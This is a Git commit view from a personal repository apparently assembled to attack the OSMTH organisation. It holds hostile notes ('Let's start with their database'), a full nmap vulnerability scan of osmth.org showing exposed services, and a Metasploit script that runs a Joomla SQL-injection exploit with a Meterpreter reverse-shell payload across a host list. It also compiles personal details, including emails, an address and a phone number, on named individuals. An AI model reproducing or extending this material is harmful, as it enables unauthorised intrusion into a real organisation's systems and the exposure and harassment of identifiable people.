Kae
/
osmth-resources
1
0
Fork 0
Code Issues Pull Requests Projects Releases Activity

company listings

This commit is contained in:
kaelta 2022-02-19 19:03:28 +00:00
parent ecbd7ddeed
commit ed63558310
20 changed files with 362 additions and 53 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

45
_layouts/gatsby-config.js
View File

@ -1,28 +1,28 @@
const path = require('path')
const path = require("path");
const PATH_PREFIX = process.env.PATH_PREFIX
const PATH_PREFIX = process.env.PATH_PREFIX;
module.exports = {
// pathPrefix: PATH_PREFIX || `/foam-template-gatsby-kb`, // a. If you are using github pages, this should be the name of your repo
pathPrefix: PATH_PREFIX || `/`, // b. If you are using Netlify/Vercel, your can keep it this way
siteMetadata: {
// some SEO configs using by gatsby-theme-kb
title: `Foam`, // Replace it with your site's title
author: `Your Name`, // Replace it with your name
description: `My personal knowledge base`, // Replace it with your site's description
title: `OSMTH`, // Replace it with your site's title
author: `Kae`, // Replace it with your name
description: `Kae's OSMTH resource pool.`, // Replace it with your site's description
},
plugins: [
{
resolve: `gatsby-theme-kb`,
options: {
rootNote: '/readme',
rootNote: "/readme",
contentPath: `${__dirname}/..`,
ignore: [
'**/_layouts/**',
'**/.git/**',
'**/.github/**',
'**/.vscode/**',
'**/.cache/**',
"**/_layouts/**",
"**/.git/**",
"**/.github/**",
"**/.vscode/**",
"**/.cache/**",
],
// this is an option for extending `gatsby-plugin-mdx` options inside `gatsby-theme-kb`,
getPluginMdx(defaultPluginMdx) {
@ -30,23 +30,24 @@ module.exports = {
defaultPluginMdx.options.gatsbyRemarkPlugins.push({
resolve: `gatsby-remark-copy-linked-files`,
options: {
ignoreFileExtensions: ['md', 'mdx'],
ignoreFileExtensions: ["md", "mdx"],
},
})
});
// an example of syntax highlighting
defaultPluginMdx.options.gatsbyRemarkPlugins.push({
resolve: 'gatsby-remark-prismjs',
resolve: "gatsby-remark-prismjs",
options: {
noInlineHighlight: true,
},
})
});
// add math support
defaultPluginMdx.options.remarkPlugins.push(require('remark-math'))
if (!defaultPluginMdx.options.rehypePlugins) defaultPluginMdx.options.rehypePlugins = []
defaultPluginMdx.options.rehypePlugins.push(require('rehype-katex'))
return defaultPluginMdx
defaultPluginMdx.options.remarkPlugins.push(require("remark-math"));
if (!defaultPluginMdx.options.rehypePlugins)
defaultPluginMdx.options.rehypePlugins = [];
defaultPluginMdx.options.rehypePlugins.push(require("rehype-katex"));
return defaultPluginMdx;
},
},
},
@ -55,12 +56,12 @@ module.exports = {
// but of course you need to reference them by absolute path, e.g. '/assets/img.png'.
// if you have multiple directories, copy this plugin section and specify other directory
// check https://github.com/csath/gatsby-plugin-copy-files-enhanced to find docs for this plugin
resolve: 'gatsby-plugin-copy-files-enhanced',
resolve: "gatsby-plugin-copy-files-enhanced",
options: {
source: path.resolve(__dirname, `../assets`),
destination: '/assets',
destination: "/assets",
purge: false,
},
},
],
}
};

26
inbox.md
View File

@ -1,17 +1,19 @@
# Inbox
- Here you can write disorganised notes to be categorised later
- Bullet points are useful, but it could be free form text as well
- Sometimes it's better to just get things off your mind quickly, rather than stop to think where it belongs
- But don't let this list get too long
- Move information to more specific documents and link to them.
- This helps you navigate between documents quickly
- For example, you can `Cmd`+`Click` this: [[todo]]
- Some notes don't end up making sense the next day
- That's ok, you can just delete them!
- You can always find them in your git history, if you really need it!
- Who the fuck is the new grand prior of OSMTH?
- Fucking Robert Disney has been dead for years. FUCK.
- His phone number was also dead for this reason, but at least we can see what
companies he made before he died thanks to that lead.
- Find out who the new webmaster is.
- There should at least be a semblance of structure within the organisaion but
everyone seems so distraught.
- Fuck the templars.
- Let's start with their database
- Running MySQL cause ofc it is, specifically version [[3.8.2]]
- A list of its CVEs can be found [here](https://www.exploit-db.com/exploits/41954)
[//begin]: # "Autogenerated link references for markdown compatibility"
[todo]: todo.md "Todo"
[//end]: # "Autogenerated link references"
[//end]: # "Autogenerated link references"

12
investigation/.editorconfig Normal file
View File

@ -0,0 +1,12 @@
# EditorConfig is awesome: https://EditorConfig.org
# top-most EditorConfig file
root = true
[*]
indent_style = space
indent_size = 2
end_of_line = lf
charset = utf-8
trim_trailing_whitespace = false
insert_final_newline = false

5
investigation/.markdownlint.yml Normal file
View File

@ -0,0 +1,5 @@
"MD013": false
"MD003":
"style": "atx_closed"
"MD007":
"indent": 4

3
investigation/companies/cass-sigma-jv.md Normal file
View File

@ -0,0 +1,3 @@
# Cass-Sigma JV
Company founded in the name of [[Sheila Disney]]

3
investigation/companies/scorpi-international.md Normal file
View File

@ -0,0 +1,3 @@
# Scorpi International
Company that still takes the name of Sigma from the late [[Robert Disney]]

3
investigation/companies/sigma-international-holdings.md Normal file
View File

@ -0,0 +1,3 @@
# Sigma International Holdings
A Private LLC founded by [[Robert Disney]] specialising in employing armored cars, bodyguards and detectives, reasons unknown.

3
investigation/people/anthony-maclean.md
View File

@ -1,5 +1,4 @@
# Anthony MacLean
> Person who responded my emails.
> Civil partner of [[George MacLean]]
> Civil partner of [[George MacLean]]

3
investigation/people/caroline-mcmahon.md
View File

@ -1,4 +1,5 @@
# Caroline McMahon
> email <carolinemcmahon@btinternet.com>
> [email](<carolinemcmahon@btinternet.com>)
Possible relative / friend of [[George MacLean]]. Email not recognised on osmth.org membership login.

29
investigation/people/robert-disney.md
View File

@ -1,16 +1,29 @@
# Robert Disney
> [AllPeople profile](<https://allpeople.com/robert+disney_osmth-us>)
[[deceasesd]] since ~2015-16
> [AllBiz Profile](<https://www.allbiz.com/business/osmth-941-698-4010>)
> [AllPeople profile](https://allpeople.com/robert+disney_osmth-us)
> [AllBiz Profile](https://www.allbiz.com/business/osmth-941-698-4010)
> [Email](<grandcommander@osmth.org>)
> [Open Corporate](https://opencorporates.com/companies/us_fl/P01000041590)
> [Open Corporate (archive link)](https://archive.is/i9qEx)
Owned [[Sigma International Holdings Inc.]],
specialising in utilising detectives, bodyguards and employing the use of armored cars.
Wife is [[Sheila Disney]], who went on to found [[Cass-Sigma JV]]
**Registered Address**
```
548 Boundary Blvd, 33947
(941) 698-4010
```
```log
548 Boundary Blvd, 33947
(941) 698-4010
```
![map](548boundaryblvd.png)
Supposed OSMTH Grand Commander, not to be confused with the webmaster (identity unknown).
Supposed OSMTH Grand Commander, not to be confused with the webmaster (identity unknown).

5
investigation/people/sheila-disney.md Normal file
View File

@ -0,0 +1,5 @@
# Sheila Disney
Supposed wife of [[Robert Disney]], now [[deceasesd]]
Founder of [[Cass-Sigma JV]], LLC.

3
investigation/sites/george-maclean.com.md Normal file
View File

@ -0,0 +1,3 @@
# George-MacLean.com
Site owner is obvs [[George MacLean]]

228
nmap_vuln_scan.log Normal file
View File

@ -0,0 +1,228 @@
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-19 00:01 GMT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 00:01
Completed NSE at 00:01, 0.00s elapsed
Initiating NSE at 00:01
Completed NSE at 00:01, 0.00s elapsed
Initiating NSE at 00:01
Completed NSE at 00:01, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 00:01
Completed Parallel DNS resolution of 1 host. at 00:01, 0.02s elapsed
Initiating SYN Stealth Scan at 00:01
Scanning osmth.org (108.179.233.77) [1000 ports]
Discovered open port 995/tcp on 108.179.233.77
Discovered open port 587/tcp on 108.179.233.77
Discovered open port 25/tcp on 108.179.233.77
Discovered open port 21/tcp on 108.179.233.77
Discovered open port 53/tcp on 108.179.233.77
Discovered open port 22/tcp on 108.179.233.77
Discovered open port 110/tcp on 108.179.233.77
Discovered open port 443/tcp on 108.179.233.77
Discovered open port 3306/tcp on 108.179.233.77
Discovered open port 80/tcp on 108.179.233.77
Discovered open port 143/tcp on 108.179.233.77
Discovered open port 993/tcp on 108.179.233.77
Discovered open port 26/tcp on 108.179.233.77
Discovered open port 2222/tcp on 108.179.233.77
Discovered open port 465/tcp on 108.179.233.77
Completed SYN Stealth Scan at 00:01, 4.92s elapsed (1000 total ports)
Initiating Service scan at 00:01
Scanning 15 services on osmth.org (108.179.233.77)
Completed Service scan at 00:02, 13.08s elapsed (15 services on 1 host)
Initiating OS detection (try #1) against osmth.org (108.179.233.77)
Retrying OS detection (try #2) against osmth.org (108.179.233.77)
Initiating Traceroute at 00:02
Completed Traceroute at 00:02, 3.18s elapsed
Initiating Parallel DNS resolution of 11 hosts. at 00:02
Completed Parallel DNS resolution of 11 hosts. at 00:02, 0.12s elapsed
NSE: Script scanning 108.179.233.77.
Initiating NSE at 00:02
NSE: [ftp-bounce] PORT response: 500 I won't open a connection to 45.33.32.156 (only to 82.1.88.5)
Completed NSE at 00:02, 11.85s elapsed
Initiating NSE at 00:02
Completed NSE at 00:02, 6.58s elapsed
Initiating NSE at 00:02
Completed NSE at 00:02, 0.01s elapsed
Nmap scan report for osmth.org (108.179.233.77)
Host is up (0.15s latency).
rDNS record for 108.179.233.77: 108-179-233-77.unifiedlayer.com
Not shown: 984 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Pure-FTPd
| ssl-cert: Subject: commonName=*.hostgator.com
| Subject Alternative Name: DNS:*.hostgator.com, DNS:hostgator.com
| Issuer: commonName=Sectigo RSA Domain Validation Secure Server CA/organizationName=Sectigo Limited/stateOrProvinceName=Greater Manchester/countryName=GB
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-08-31T00:00:00
| Not valid after: 2022-08-31T23:59:59
| MD5: efb4 5911 f42d dc72 0426 f6b6 750f a4f1
|_SHA-1: a77f dd14 91f0 5b64 46b1 5422 e787 d91f 7cec 0e30
|_ssl-date: 2022-02-19T00:02:36+00:00; 0s from scanner time.
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
| ssh-hostkey:
|_ 1024 f9:96:f6:88:33:c6:c8:b3:03:2c:bc:3b:5a:fd:ef:5b (DSA)
25/tcp open smtp Exim smtpd 4.94.2
|_smtp-commands: Couldn't establish connection on port 25
26/tcp open smtp Exim smtpd 4.94.2
| smtp-commands: gator4238.hostgator.com Hello cpc92956-glfd8-2-0-cust4.6-2.cable.virginm.net [82.1.88.5], SIZE 52428800, 8BITMIME, PIPELINING, PIPE_CONNECT, AUTH PLAIN LOGIN, STARTTLS, HELP
|_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
53/tcp open domain ISC BIND 9.8.2rc1 (RedHat Enterprise Linux 6)
| dns-nsid:
|_ bind.version: 9.8.2rc1-RedHat-9.8.2-0.68.rc1.el6
80/tcp open http Apache httpd
|_http-favicon: Unknown favicon MD5: 2041E701B197F1DFA13470F343061292
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache
| http-robots.txt: 16 disallowed entries (15 shown)
| /joomla/administrator/ /administrator/ /cache/ /cli/
| /components/ /images/ /includes/ /installation/ /language/
|_/libraries/ /logs/ /media/ /modules/ /plugins/ /templates/
|_http-title: Did not follow redirect to https://osmth.org/
110/tcp open pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=*.osmth.org
| Subject Alternative Name: DNS:*.osmth.org, DNS:osmth.org, DNS:www.archive.osmth.org, DNS:www.archives.osmth.org, DNS:www.calendar.osmth.org, DNS:www.canada.osmth.org, DNS:www.carpediem.osmth.org, DNS:www.gmcevent.osmth.org, DNS:www.hgtest.osmth.org, DNS:www.preview.osmth.org, DNS:www.templar900.osmth.org, DNS:www.uk.osmth.org
| Issuer: commonName=R3/organizationName=Let's Encrypt/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-01-15T10:06:09
| Not valid after: 2022-04-15T10:06:08
| MD5: f9bc 2c5c 3327 6167 cacb d402 a062 1295
|_SHA-1: 465f a23b de46 3952 d168 bfad 4d0b 732a baa3 7366
|_pop3-capabilities: UIDL PIPELINING AUTH-RESP-CODE RESP-CODES SASL(PLAIN LOGIN) USER TOP CAPA STLS
|_ssl-date: 2022-02-19T00:02:34+00:00; 0s from scanner time.
143/tcp open imap Dovecot imapd
| ssl-cert: Subject: commonName=*.osmth.org
| Subject Alternative Name: DNS:*.osmth.org, DNS:osmth.org, DNS:www.archive.osmth.org, DNS:www.archives.osmth.org, DNS:www.calendar.osmth.org, DNS:www.canada.osmth.org, DNS:www.carpediem.osmth.org, DNS:www.gmcevent.osmth.org, DNS:www.hgtest.osmth.org, DNS:www.preview.osmth.org, DNS:www.templar900.osmth.org, DNS:www.uk.osmth.org
| Issuer: commonName=R3/organizationName=Let's Encrypt/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-01-15T10:06:09
| Not valid after: 2022-04-15T10:06:08
| MD5: f9bc 2c5c 3327 6167 cacb d402 a062 1295
|_SHA-1: 465f a23b de46 3952 d168 bfad 4d0b 732a baa3 7366
|_imap-capabilities: more ENABLE OK SASL-IR post-login AUTH=LOGINA0001 AUTH=PLAIN ID have listed IDLE STARTTLS capabilities LOGIN-REFERRALS NAMESPACE Pre-login LITERAL+ IMAP4rev1
|_ssl-date: 2022-02-19T00:02:34+00:00; 0s from scanner time.
443/tcp open ssl/http Apache httpd
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| ssl-cert: Subject: commonName=*.osmth.org
| Subject Alternative Name: DNS:*.osmth.org, DNS:osmth.org, DNS:www.archive.osmth.org, DNS:www.archives.osmth.org, DNS:www.calendar.osmth.org, DNS:www.canada.osmth.org, DNS:www.carpediem.osmth.org, DNS:www.gmcevent.osmth.org, DNS:www.hgtest.osmth.org, DNS:www.preview.osmth.org, DNS:www.templar900.osmth.org, DNS:www.uk.osmth.org
| Issuer: commonName=R3/organizationName=Let's Encrypt/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-01-15T10:06:09
| Not valid after: 2022-04-15T10:06:08
| MD5: f9bc 2c5c 3327 6167 cacb d402 a062 1295
|_SHA-1: 465f a23b de46 3952 d168 bfad 4d0b 732a baa3 7366
|_http-favicon: Unknown favicon MD5: 2041E701B197F1DFA13470F343061292
|_http-title: OSMTH
|_ssl-date: TLS randomness does not represent time
|_http-generator: Joomla! - Open Source Content Management
| http-robots.txt: 16 disallowed entries (15 shown)
| /joomla/administrator/ /administrator/ /cache/ /cli/
| /components/ /images/ /includes/ /installation/ /language/
|_/libraries/ /logs/ /media/ /modules/ /plugins/ /templates/
|_http-server-header: Apache
465/tcp open tcpwrapped
|_smtp-commands: Couldn't establish connection on port 465
587/tcp open tcpwrapped
|_smtp-commands: Couldn't establish connection on port 587
993/tcp open ssl/imap Dovecot imapd
| ssl-cert: Subject: commonName=*.osmth.org
| Subject Alternative Name: DNS:*.osmth.org, DNS:osmth.org, DNS:www.archive.osmth.org, DNS:www.archives.osmth.org, DNS:www.calendar.osmth.org, DNS:www.canada.osmth.org, DNS:www.carpediem.osmth.org, DNS:www.gmcevent.osmth.org, DNS:www.hgtest.osmth.org, DNS:www.preview.osmth.org, DNS:www.templar900.osmth.org, DNS:www.uk.osmth.org
| Issuer: commonName=R3/organizationName=Let's Encrypt/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-01-15T10:06:09
| Not valid after: 2022-04-15T10:06:08
| MD5: f9bc 2c5c 3327 6167 cacb d402 a062 1295
|_SHA-1: 465f a23b de46 3952 d168 bfad 4d0b 732a baa3 7366
|_ssl-date: 2022-02-19T00:02:33+00:00; 0s from scanner time.
|_imap-capabilities: more ENABLE OK SASL-IR post-login AUTH=LOGINA0001 NAMESPACE ID have listed IDLE Pre-login AUTH=PLAIN LOGIN-REFERRALS capabilities LITERAL+ IMAP4rev1
995/tcp open ssl/pop3 Dovecot pop3d
|_ssl-date: 2022-02-19T00:02:33+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=*.osmth.org
| Subject Alternative Name: DNS:*.osmth.org, DNS:osmth.org, DNS:www.archive.osmth.org, DNS:www.archives.osmth.org, DNS:www.calendar.osmth.org, DNS:www.canada.osmth.org, DNS:www.carpediem.osmth.org, DNS:www.gmcevent.osmth.org, DNS:www.hgtest.osmth.org, DNS:www.preview.osmth.org, DNS:www.templar900.osmth.org, DNS:www.uk.osmth.org
| Issuer: commonName=R3/organizationName=Let's Encrypt/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-01-15T10:06:09
| Not valid after: 2022-04-15T10:06:08
| MD5: f9bc 2c5c 3327 6167 cacb d402 a062 1295
|_SHA-1: 465f a23b de46 3952 d168 bfad 4d0b 732a baa3 7366
|_pop3-capabilities: UIDL PIPELINING AUTH-RESP-CODE SASL(PLAIN LOGIN) TOP RESP-CODES CAPA USER
2222/tcp open ssh OpenSSH 5.3 (protocol 2.0)
| ssh-hostkey:
| 1024 f9:96:f6:88:33:c6:c8:b3:03:2c:bc:3b:5a:fd:ef:5b (DSA)
|_ 2048 2a:2c:6e:8f:c3:df:8b:64:58:70:3d:02:a9:cd:0a:a6 (RSA)
2525/tcp filtered ms-v-worlds
3306/tcp open mysql MySQL 5.6.41-84.1
| mysql-info:
| Protocol: 10
| Version: 5.6.41-84.1
| Thread ID: 9292250
| Capabilities flags: 65535
| Some Capabilities: Support41Auth, Speaks41ProtocolOld, SupportsTransactions, LongColumnFlag, InteractiveClient, IgnoreSigpipes, DontAllowDatabaseTableColumn, Speaks41ProtocolNew, LongPassword, ODBCClient, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, SupportsLoadDataLocal, FoundRows, SupportsCompression, SwitchToSSLAfterHandshake, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
| Status: Autocommit
| Salt: fj`'<:NZZ45Mb&4tj8vm
|_ Auth Plugin Name: mysql_native_password
| ssl-cert: Subject: commonName=*.hostgator.com
| Subject Alternative Name: DNS:*.hostgator.com, DNS:hostgator.com
| Issuer: commonName=Sectigo RSA Domain Validation Secure Server CA/organizationName=Sectigo Limited/stateOrProvinceName=Greater Manchester/countryName=GB
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-08-31T00:00:00
| Not valid after: 2022-08-31T23:59:59
| MD5: efb4 5911 f42d dc72 0426 f6b6 750f a4f1
|_SHA-1: a77f dd14 91f0 5b64 46b1 5422 e787 d91f 7cec 0e30
|_ssl-date: 2022-02-19T00:02:34+00:00; -1s from scanner time.
Aggressive OS guesses: Linux 2.6.32 (95%), Linux 4.4 (95%), Linux 2.6.32 or 3.10 (94%), Linux 2.6.32 - 2.6.35 (93%), Linux 2.6.32 - 2.6.39 (93%), Linux 4.0 (92%), Linux 3.11 - 4.1 (91%), Linux 3.2 - 3.8 (91%), Linux 2.6.18 (91%), Linux 5.0 - 5.4 (90%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 43.907 days (since Thu Jan 6 02:17:06 2022)
Network Distance: 20 hops
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: gator4238.hostgator.com; OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:6
TRACEROUTE (using port 8080/tcp)
HOP RTT ADDRESS
1 7.29 ms 192.168.0.1
2 ...
3 13.67 ms glfd-core-2a-xe-805-0.network.virginmedia.net (80.7.14.13)
4 ... 7
8 25.21 ms 86.85-254-62.static.virginmediabusiness.co.uk (62.254.85.86)
9 ...
10 21.17 ms ldn-bb1-link.ip.twelve99.net (62.115.120.74)
11 124.50 ms nyk-bb2-link.ip.twelve99.net (62.115.113.20)
12 122.89 ms ash-bb2-link.ip.twelve99.net (62.115.136.201)
13 142.04 ms rest-bb1-link.ip.twelve99.net (62.115.123.122)
14 131.67 ms hou-b1-link.ip.twelve99.net (62.115.116.46)
15 145.68 ms cyrusone-svc067800-lag002969.ip.twelve99-cust.net (62.115.184.145)
16 153.65 ms 72-250-192-6.cyrusone.com (72.250.192.6)
17 134.40 ms hou-b1-link.ip.twelve99.net (62.115.116.46)
18 151.71 ms cyrusone-svc067800-lag002969.ip.twelve99-cust.net (62.115.184.145)
19 137.13 ms 108-167-133-82.unifiedlayer.com (108.167.133.82)
20 163.97 ms 108-179-233-77.unifiedlayer.com (108.179.233.77)
NSE: Script Post-scanning.
Initiating NSE at 00:02
Completed NSE at 00:02, 0.00s elapsed
Initiating NSE at 00:02
Completed NSE at 00:02, 0.00s elapsed
Initiating NSE at 00:02
Completed NSE at 00:02, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.58 seconds
Raw packets sent: 1257 (57.320KB) | Rcvd: 1139 (51.378KB)

5
run_webview.py
View File

@ -1,2 +1,5 @@
#!/usr/bin/env python3
import os; os.system("cd _layouts && yarn && yarn dev")
# -*- coding: utf-8 -*-
import os
os.system("cd _layouts && yarn && yarn dev")

11
scripts/msf/proftp_sreplace--tcp.rb → scripts/msf/joomla_php-meterpreter-reverse-tcp.rb
View File

@ -1,16 +1,13 @@
ip_list = "/Users/#{ENV['USER']}/Libraries/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100000.txt"
payload_name = "php/meterpreter/reverse_tcp"
File.open(ip_list, 'rb').each_line do |ip|
print_status("Trying against #{ip}")
run_single("use exploit/linux/ftp/proftp_sreplace")
run_single("use exploit/unix/webapp/joomla_comfields_sqli_rce")
run_single("set RHOST #{ip}")
run_single("set DisablePayloadHandler true")
#
# Set a payload that's the same as the handler.
# You might also need to add more run_single commands to configure other
# payload options.
#
run_single("set PAYLOAD [payload name]")
run_single("set PAYLOAD #{payload_name}")
run_single("run")
end

4
scripts/shodan/.gitignore vendored Normal file
View File

@ -0,0 +1,4 @@
bin/
include/
lib/
pip/

3
scripts/shodan/.venv/pyvenv.cfg Normal file
View File

@ -0,0 +1,3 @@
home = /opt/homebrew/opt/python@3.9/bin
include-system-site-packages = false
version = 3.9.10

18
scripts/shodan/index.py Normal file
View File

@ -0,0 +1,18 @@
from shodan import Shodan as Shd
from shodan.cli.helpers import get_api_key as Apikey
if __name__ == '__main__':
api = Shd(Apikey())
limit = 500
counter = 0
for banner in api.search_cursor('product:mongodb'):
# Perform some custom manipulations or stream the results to a database
# For this example, I'll just print out the "data" property
print(banner['data'])
# Keep track of how many results have been downloaded so we don't use up all our query credits
counter += 1
if counter >= limit:
break

3
scripts/shodan/install/pyvenv.cfg Normal file
View File

@ -0,0 +1,3 @@
home = /opt/homebrew/opt/python@3.9/bin
include-system-site-packages = false
version = 3.9.10

3
scripts/shodan/pyvenv.cfg Normal file
View File

@ -0,0 +1,3 @@
home = /opt/homebrew/opt/python@3.9/bin
include-system-site-packages = false
version = 3.9.10